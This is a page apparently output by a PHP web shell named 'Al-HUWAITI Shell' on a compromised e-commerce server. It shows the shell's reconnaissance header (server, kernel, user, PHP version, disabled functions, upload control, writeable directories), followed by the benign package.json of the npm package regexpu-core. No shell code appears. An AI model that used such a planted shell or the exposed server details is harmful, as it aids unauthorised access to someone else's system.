Al-HUWAITI Shell
Al-huwaiti


Server : nginx/1.18.0
System : Linux localhost 6.14.3-x86_64-linode168 #1 SMP PREEMPT_DYNAMIC Mon Apr 21 19:47:55 EDT 2025 x86_64
User : www-data ( 33)
PHP Version : 8.0.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Directory :  /var/www/ecommerce/node_modules/regexpu-core/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/ecommerce/node_modules/regexpu-core/package.json
{
	"name": "regexpu-core",
	"version": "4.8.0",
	"description": "regexpu’s core functionality (i.e. `rewritePattern(pattern, flag)`), capable of translating ES6 Unicode regular expressions to ES5.",
	"homepage": "https://mths.be/regexpu",
	"main": "rewrite-pattern.js",
	"engines": {
		"node": ">=4"
	},
	"keywords": [
		"codegen",
		"desugaring",
		"ecmascript",
		"es5",
		"es6",
		"harmony",
		"javascript",
		"refactoring",
		"regex",
		"regexp",
		"regular expressions",
		"rewriting",
		"syntax",
		"transformation",
		"transpile",
		"transpiler",
		"unicode"
	],
	"license": "MIT",
	"author": {
		"name": "Mathias Bynens",
		"url": "https://mathiasbynens.be/"
	},
	"repository": {
		"type": "git",
		"url": "https://github.com/mathiasbynens/regexpu-core.git"
	},
	"bugs": "https://github.com/mathiasbynens/regexpu-core/issues",
	"files": [
		"LICENSE-MIT.txt",
		"rewrite-pattern.js",
		"data/character-class-escape-sets.js",
		"data/iu-mappings.js"
	],
	"scripts": {
		"build": "node scripts/iu-mappings.js && node scripts/character-class-escape-sets.js",
		"test": "mocha tests",
		"cover": "istanbul cover --report html node_modules/.bin/_mocha tests -- -u exports -R spec"
	},
	"dependencies": {
		"regenerate": "^1.4.2",
		"regenerate-unicode-properties": "^9.0.0",
		"regjsgen": "^0.5.2",
		"regjsparser": "^0.7.0",
		"unicode-match-property-ecmascript": "^2.0.0",
		"unicode-match-property-value-ecmascript": "^2.0.0"
	},
	"devDependencies": {
		"codecov": "^3.8.3",
		"istanbul": "^0.4.5",
		"jsesc": "^3.0.2",
		"lodash": "^4.17.21",
		"mocha": "^9.1.1",
		"regexpu-fixtures": "2.1.4",
		"@unicode/unicode-14.0.0": "^1.2.1"
	}
}

Al-HUWAITI Shell